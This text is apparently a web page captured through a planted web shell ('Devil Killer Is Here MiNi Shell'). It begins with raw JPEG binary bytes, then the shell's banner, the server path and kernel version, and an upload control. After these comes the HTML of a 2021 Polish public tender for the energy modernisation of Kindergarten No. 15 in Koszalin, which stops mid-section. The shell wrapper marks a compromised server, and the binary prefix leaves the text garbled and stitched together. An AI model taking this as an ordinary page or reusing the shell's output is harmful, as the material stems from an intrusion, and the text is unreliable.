JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211007/0022134201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizację energetyczną budynku Przedszkola nr 15 <br/>przy ul. Stanisława Staszica 11 w Koszalinie <br/>w ramach zadania inwestycyjnego „Modernizacja energetyczna obiektów użyteczności publicznej (...) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Koszalin - Urząd Miejski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920802</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek Staromiejski 6-7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">75-007</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">94 348 86 54</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">joanna.ratuszna@um.koszalin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.koszalin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizację energetyczną budynku Przedszkola nr 15 <br/>przy ul. Stanisława Staszica 11 w Koszalinie <br/>w ramach zadania inwestycyjnego „Modernizacja energetyczna obiektów użyteczności publicznej (...) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8ed7b07d-2736-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00221342</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000100/26/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Modernizacja energetyczna obiektów użyteczności publicznej - Przedszkole nr 15 - w ramach projektu "Modern. energ. bud. użyt. publ.: Żłobek Skrzat, Przedszkole nr 13, 14, 15, ZS nr 7 w Koszalinie"</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Umowa o dofinansowanie projektu pn. "Modernizacja energetyczna budynków użyteczności publicznej: Żłobek "Skrzat", Przedszkole nr 13, 14, 15, ZS nr 7 w Koszalinie" nr umowy o dofinansowanie RPZP.02.05.00-32-A063/16-00 z dnia 06.11.2018 r. Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego (...) </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej:<br/>joanna.ratuszna@um.koszalin.pl, z zastrzeżeniem:1.ppkt 1.4 w pkt 10 Roz I SWZ - Komunikacja w postęp o udzielenie zamówienia (nie dot złożenia oferty) odbywa się elektronicznie za<br/>pośrednictwem:1)dedykowanego „Formularza do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal;lub 2)poczty elektronicznej, na adres e-mail:<br/>joanna.ratuszna@um.koszalin.pl; 2.ppkt 1 w pkt 14 Roz I SWZ - Ofertę w przedm postęp Wykonawca<br/>składa za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego<br/>na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez<br/>Wykonawcę jest dostępna na miniPortalu, w szczegółach przedm postęp.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>powinien dysponować kontem na ePUAP.<br/>2. Ofertę w przedmiotowym postępowaniu Wykonawca składa za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na<br/>miniPortalu. Sposób złożenia oferty został szczegółowo opisany w Rozdziale I pkt 14 SWZ.<br/>3. Komunikacja w postępowaniu o udzielenie zamówienia (nie dotyczy złożenia oferty) odbywa się<br/>elektronicznie za pośrednictwem:<br/>3.1) dedykowanego „Formularza do komunikacji” dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal;<br/>lub<br/>3.2) poczty elektronicznej, na adres e-mail: joanna.ratuszna@um.koszalin.pl.<br/>4. Za datę przekazania za pośrednictwem ePUAP oferty, oświadczenia, o którym mowa w art. 125 ust.<br/>1 ustawy PZP, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz<br/>innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę<br/>ich przekazania na ePUAP.<br/>5. Przy komunikacji za pośrednictwem poczty elektronicznej Zamawiający lub Wykonawca na żądanie drugiej strony niezwłocznie potwierdza fakt otrzymania wiadomości. W przypadku niepotwierdzenia ze strony Wykonawcy odbioru przesłanych wiadomości (pomimo takiego żądania) Zamawiający uzna, że wiadomość została skutecznie przekazana do Wykonawcy.<br/>6. We wszelkiej korespondencji związanej z niniejszym postępowaniem Wykonawcy posługują się sygnaturą postępowania, tj. BZP-7.271.1.20.2021.JR.<br/>7. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy użyciu formularzy: „Formularza do złożenia, zmiany, wycofania oferty lub wniosku”<br/>oraz „Formularza do komunikacji” opisane zostały w Regulaminie korzystania z systemu miniPortal<br/>oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>8. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularza do komunikacji” wynosi 150 MB.<br/>9. Sposób zaszyfrowania oferty opisany został w „Instrukcji użytkownika systemu miniPortal-ePUAP”, dostępnej na stronie: https://miniportal.uzp.gov.pl/.<br/>10. Ofertę, Oświadczenie składane na podstawie art. 125 ust. 1 ustawy PZP, Podmiotowe środki<br/>dowodowe, w tym Oświadczenie składane na podstawie art. 117 ust. 4 ustawy PZP, Zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia, Przedmiotowe środki dowodowe oraz Pełnomocnictwo sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2021 r., poz. 670 z późn. zm.) z uwzględnieniem rodzaju przekazywanych danych.<br/>11. Informacje, oświadczenia lub dokumenty, inne niż określone w ppkt 10, przekazywane w<br/>postępowaniu, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie ww. art. 18 ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, o których mowa w ppkt 3.<br/>12. Zamawiający dopuszcza w szczególności następujący format przesyłanych danych: pdf, doc, docx, rtf, xps, odt, txt.<br/>13. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i ust. 2 Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku (RODO) uprzejmie informujemy, że:<br/>1) administratorem Pani/Pana danych jest Gmina Miasto Koszalin reprezentowana przez Prezydenta<br/>Miasta Koszalina – Urząd Miejski ul. Rynek Staromiejski 6-7,<br/>e-mail: um.koszalin@um.koszalin.pl;<br/>2) w Urzędzie Miejskim w Koszalinie został wyznaczony Inspektor Ochrony Danych: Mariusz Krasicki Urząd Miejski ul. Rynek Staromiejski 6-7, e-mail: iodo@um.koszalin.pl;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego oraz zawarciem umowy;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP;<br/>5) Pani/Pana dane osobowe będą przechowywane do czasu osiągnięcia celu, w jakim je pozyskaliśmy;<br/>kryteria ustalania czasu, w którym dane osobowe przetwarzane na podstawie przepisów prawa będą<br/>przechowywane określa Rozporządzenie Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie<br/>instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i<br/>zakresu działania archiwów zakładowych (Dz. U. z 2011 r. Nr 14, poz. 67 z późn. zm.);<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany;<br/>8) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*;<br/>− na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych<br/>osobowych**;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) Pani/Pana dane osobowe nie będą przekazywane do państw trzecich lub organizacji międzynarodowych.<br/>___________________<br/>* Wyjaśnienie: w przypadku skorzystania przez osobę, której dane osobowe są przetwarzane przez<br/>Zamawiającego, z uprawnienia, o którym mowa w art. 15 RODO, Zamawiający może żądać od osoby<br/>występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy<br/>lub daty zakończonego postępowania o udzielenie zamówienia,<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu postępowania oraz jego załączników,<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz: pkt 3.15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP-7.271.1.20.2021.JR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1680420,76 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Przedmiotem zamówienia jest modernizacja energetyczna budynku Przedszkola nr 15 przy ul.<br/>Stanisława Staszica 11 w Koszalinie w ramach zadania inwestycyjnego „Modernizacja<br/>energetyczna obiektów użyteczności publicznej Żłobek Skrzat, Przedszkole nr 13, 14, 15, ZS nr<br/>7 w Koszalinie”.<br/>II. ZAKRES RZECZOWY ROBÓT OBEJMUJE m.in.:<br/>1. Wykonanie izolacji przeciwwilgociowej ścian zaprawą wodoszczelną bitumiczną oraz<br/>ocieplenie ścian fundamentowych i ścian piwnic od poziomu ław fundamentowych do wierzchu<br/>cokołu styrodurem gr. 14 cm (λ=0,032 W/mK);<br/>2. Wykonanie cokołu budynku i wykończenie go tynkiem mozaikowym w kolorze wskazanym na<br/>rysunkach lub tynkiem równorzędnym o identycznych parametrach, kolorze i strukturze;<br/>3. Wykonanie opasek wokół budynku;<br/>4. Ocieplenie ścian zewnętrznych styropianem typu EPS 70 Fasada gr. 15 cm, TR 100 o<br/>współczynniku λ=0,032 W/mK wraz z wykończeniem tynkiem cienkowarstwowym mineralnym<br/>malowanym farbą silikonową z efektem perlenia, kolor wg rysunków elewacji lub tynkiem<br/>równorzędnym o identycznych parametrach i strukturze;<br/>5. Montaż budek lęgowych dla ptaków na elewacji i okolicznych drzewach, zgodnie z zapisami w<br/>Ekspertyzie ornitologiczno – chiropterologicznej;<br/>6. Ocieplenie stropodachu wentylowanego metodą wdmuchiwania granulatu o współczynniku<br/>λ=0,042 W/mK, gr. 24cm;<br/>7. Wymianę wszystkich obróbek blacharskich (rynny, rury spustowe, parapety zewnętrzne);<br/>8. Wymianę części okien i drzwi zewnętrznych;<br/>9. Remont, ocieplenie i otynkowanie kominów;<br/>10. Wymianę krat okiennych;<br/>11. Remont schodów zewnętrznych;<br/>12. Wymianę wszystkich balustrad zewnętrznych;<br/>13. Remont konstrukcji zadaszeń;<br/>14. Wykonanie i montaż obudów grzejnikowych;<br/>15. Rozbiórkę ścian żelbetowych od strony południowo zachodniej;<br/>16. Przebudowę instalacji centralnego ogrzewania i ciepła technologicznego;<br/>17. Przebudowę instalacji wentylacji mechanicznej;<br/>18. Obudowę kanałów wentylacji z płyt G-K;<br/>19. Przebudowę instalacji wody zimnej i ciepłej;<br/>20. Wymianę instalacji hydrantowej p.poż.;<br/>21. Wymianę osprzętu sanitarnego;<br/>22. Wymianę grzejników CO;<br/>23. Przebudowę i modernizacja węzła CO;<br/>24. Izolację termiczna rur i wykonanie na nich obudów z płyt G-K; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45443000-4 - Roboty elewacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45223821-7 - Elementy gotowe</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45261410-1 - Izolowanie dachu</p> <p class="mb-0">45262000-1 - Specjalne roboty budowlane inne niż dachowe</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi<br/>kryteriami i ich wagą:<br/>1) Cena (C) – 60%<br/>2) Przedłużenie okresu gwarancji i rękojmi za wady na cały przedmiot zamówienia (G) – 20%<br/>3) Skrócenie terminu realizacji przedmiotu zamówienia (S) – 20%<br/>Ocena ofert (O) zostanie przeprowadzona w oparciu o przedstawione kryteria oraz ich wagę.<br/>Oferty oceniane będą punktowo w przyjętej skali 100 pkt.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. Obliczenia<br/>dokonywane będą z dokładnością do dwóch miejsc po przecinku, według wzoru: O = C + G + S</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji i rękojmi za wady na cały przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne 